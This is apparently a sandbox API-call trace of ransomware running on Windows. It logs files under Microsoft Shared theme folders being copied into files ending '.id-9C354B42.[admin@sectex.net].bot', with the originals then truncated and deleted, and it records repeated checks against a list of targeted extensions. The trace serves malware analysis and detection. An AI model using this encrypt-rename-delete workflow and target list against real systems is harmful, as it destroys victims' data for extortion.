	[0042.762] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.762] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0043.005] GetLastError () returned 0x0
	[0043.005] ReadFile (in: hFile=0x1b0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x8864, lpOverlapped=0x0) returned 1
	[0043.007] WriteFile (in: hFile=0x1cc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x8870, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x8870, lpOverlapped=0x0) returned 1
	[0043.008] ReadFile (in: hFile=0x1b0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.008] WriteFile (in: hFile=0x1cc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0043.009] SetEndOfFile (hFile=0x1cc) returned 1
	[0043.009] CloseHandle (hObject=0x1cc) returned 1
	[0043.010] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.010] SetEndOfFile (hFile=0x1b0) returned 1
	[0043.011] CloseHandle (hObject=0x1b0) returned 1
	[0043.011] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.011] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 1
	[0043.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73
	[0043.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73
	[0043.011] lstrlenW (lpString=".doc") returned 4
	[0043.011] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.011] lstrlenW (lpString=".docx") returned 5
	[0043.011] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.011] lstrlenW (lpString=".pdf") returned 4
	[0043.011] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.011] lstrlenW (lpString=".xls") returned 4
	[0043.011] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.011] lstrlenW (lpString=".xlsx") returned 5
	[0043.011] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.011] lstrlenW (lpString=".ppt") returned 4
	[0043.011] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73
	[0043.011] lstrlenW (lpString=".zip") returned 4
	[0043.012] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.012] lstrlenW (lpString=".rar") returned 4
	[0043.012] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.012] lstrlenW (lpString=".bz2") returned 4
	[0043.012] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.012] lstrlenW (lpString=".7z") returned 3
	[0043.012] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73
	[0043.012] lstrlenW (lpString=".dbf") returned 4
	[0043.012] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73
	[0043.012] lstrlenW (lpString=".1cd") returned 4
	[0043.012] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73
	[0043.012] lstrlenW (lpString=".jpg") returned 4
	[0043.012] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73
	[0043.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73
	[0043.012] lstrlenW (lpString=".doc") returned 4
	[0043.012] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.012] lstrlenW (lpString=".docx") returned 5
	[0043.012] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.012] lstrlenW (lpString=".pdf") returned 4
	[0043.012] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.012] lstrlenW (lpString=".xls") returned 4
	[0043.012] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.012] lstrlenW (lpString=".xlsx") returned 5
	[0043.012] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.012] lstrlenW (lpString=".ppt") returned 4
	[0043.012] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73
	[0043.012] lstrlenW (lpString=".zip") returned 4
	[0043.012] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.013] lstrlenW (lpString=".rar") returned 4
	[0043.013] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.013] lstrlenW (lpString=".bz2") returned 4
	[0043.013] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.013] lstrlenW (lpString=".7z") returned 3
	[0043.013] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73
	[0043.013] lstrlenW (lpString=".dbf") returned 4
	[0043.013] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73
	[0043.013] lstrlenW (lpString=".1cd") returned 4
	[0043.013] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73
	[0043.013] lstrlenW (lpString=".jpg") returned 4
	[0043.013] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.013] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0043.013] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0043.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0043.013] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=3479) returned 1
	[0043.014] CloseHandle (hObject=0x1b0) returned 1
	[0043.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif")) returned 0x20
	[0043.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.014] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0043.014] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.014] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.014] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0043.016] GetLastError () returned 0x0
	[0043.016] ReadFile (in: hFile=0x1b0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xd97, lpOverlapped=0x0) returned 1
	[0043.017] WriteFile (in: hFile=0x1cc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xda0, lpOverlapped=0x0) returned 1
	[0043.018] ReadFile (in: hFile=0x1b0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.018] WriteFile (in: hFile=0x1cc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0043.018] SetEndOfFile (hFile=0x1cc) returned 1
	[0043.018] CloseHandle (hObject=0x1cc) returned 1
	[0043.019] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.019] SetEndOfFile (hFile=0x1b0) returned 1
	[0043.020] CloseHandle (hObject=0x1b0) returned 1
	[0043.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.020] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif")) returned 1
	[0043.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76
	[0043.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76
	[0043.020] lstrlenW (lpString=".doc") returned 4
	[0043.020] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.020] lstrlenW (lpString=".docx") returned 5
	[0043.020] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.020] lstrlenW (lpString=".pdf") returned 4
	[0043.020] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.020] lstrlenW (lpString=".xls") returned 4
	[0043.020] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.020] lstrlenW (lpString=".xlsx") returned 5
	[0043.020] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.020] lstrlenW (lpString=".ppt") returned 4
	[0043.020] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76
	[0043.021] lstrlenW (lpString=".zip") returned 4
	[0043.021] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.021] lstrlenW (lpString=".rar") returned 4
	[0043.021] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.021] lstrlenW (lpString=".bz2") returned 4
	[0043.021] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.021] lstrlenW (lpString=".7z") returned 3
	[0043.021] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76
	[0043.021] lstrlenW (lpString=".dbf") returned 4
	[0043.021] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76
	[0043.021] lstrlenW (lpString=".1cd") returned 4
	[0043.021] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76
	[0043.021] lstrlenW (lpString=".jpg") returned 4
	[0043.021] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76
	[0043.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76
	[0043.021] lstrlenW (lpString=".doc") returned 4
	[0043.021] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.021] lstrlenW (lpString=".docx") returned 5
	[0043.021] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.021] lstrlenW (lpString=".pdf") returned 4
	[0043.021] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.021] lstrlenW (lpString=".xls") returned 4
	[0043.021] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.021] lstrlenW (lpString=".xlsx") returned 5
	[0043.021] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.021] lstrlenW (lpString=".ppt") returned 4
	[0043.021] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76
	[0043.021] lstrlenW (lpString=".zip") returned 4
	[0043.022] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.022] lstrlenW (lpString=".rar") returned 4
	[0043.022] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.022] lstrlenW (lpString=".bz2") returned 4
	[0043.022] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.022] lstrlenW (lpString=".7z") returned 3
	[0043.022] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76
	[0043.022] lstrlenW (lpString=".dbf") returned 4
	[0043.022] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76
	[0043.022] lstrlenW (lpString=".1cd") returned 4
	[0043.022] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76
	[0043.022] lstrlenW (lpString=".jpg") returned 4
	[0043.022] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.022] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0043.022] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0043.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0043.022] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=31837) returned 1
	[0043.022] CloseHandle (hObject=0x1b0) returned 1
	[0043.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 0x20
	[0043.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.023] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0043.023] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.023] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.023] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0043.023] GetLastError () returned 0x0
	[0043.023] ReadFile (in: hFile=0x1b0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x7c5d, lpOverlapped=0x0) returned 1
	[0043.025] WriteFile (in: hFile=0x1cc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x7c60, lpOverlapped=0x0) returned 1
	[0043.026] ReadFile (in: hFile=0x1b0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.026] WriteFile (in: hFile=0x1cc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0043.026] SetEndOfFile (hFile=0x1cc) returned 1
	[0043.026] CloseHandle (hObject=0x1cc) returned 1
	[0043.027] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.027] SetEndOfFile (hFile=0x1b0) returned 1
	[0043.028] CloseHandle (hObject=0x1b0) returned 1
	[0043.028] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.029] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 1
	[0043.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77
	[0043.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77
	[0043.029] lstrlenW (lpString=".doc") returned 4
	[0043.029] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.029] lstrlenW (lpString=".docx") returned 5
	[0043.029] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.029] lstrlenW (lpString=".pdf") returned 4
	[0043.029] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.029] lstrlenW (lpString=".xls") returned 4
	[0043.029] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.029] lstrlenW (lpString=".xlsx") returned 5
	[0043.029] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.029] lstrlenW (lpString=".ppt") returned 4
	[0043.029] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77
	[0043.029] lstrlenW (lpString=".zip") returned 4
	[0043.029] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.029] lstrlenW (lpString=".rar") returned 4
	[0043.029] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.029] lstrlenW (lpString=".bz2") returned 4
	[0043.029] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.029] lstrlenW (lpString=".7z") returned 3
	[0043.029] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77
	[0043.029] lstrlenW (lpString=".dbf") returned 4
	[0043.029] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77
	[0043.029] lstrlenW (lpString=".1cd") returned 4
	[0043.030] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77
	[0043.030] lstrlenW (lpString=".jpg") returned 4
	[0043.030] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77
	[0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77
	[0043.030] lstrlenW (lpString=".doc") returned 4
	[0043.030] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.030] lstrlenW (lpString=".docx") returned 5
	[0043.030] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.030] lstrlenW (lpString=".pdf") returned 4
	[0043.030] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.030] lstrlenW (lpString=".xls") returned 4
	[0043.030] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.030] lstrlenW (lpString=".xlsx") returned 5
	[0043.030] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.030] lstrlenW (lpString=".ppt") returned 4
	[0043.030] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77
	[0043.030] lstrlenW (lpString=".zip") returned 4
	[0043.030] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.030] lstrlenW (lpString=".rar") returned 4
	[0043.030] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.030] lstrlenW (lpString=".bz2") returned 4
	[0043.030] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.030] lstrlenW (lpString=".7z") returned 3
	[0043.030] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77
	[0043.030] lstrlenW (lpString=".dbf") returned 4
	[0043.030] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77
	[0043.030] lstrlenW (lpString=".1cd") returned 4
	[0043.030] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77
	[0043.031] lstrlenW (lpString=".jpg") returned 4
	[0043.031] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.031] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0043.031] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0043.031] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0043.031] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=2722) returned 1
	[0043.031] CloseHandle (hObject=0x1b0) returned 1
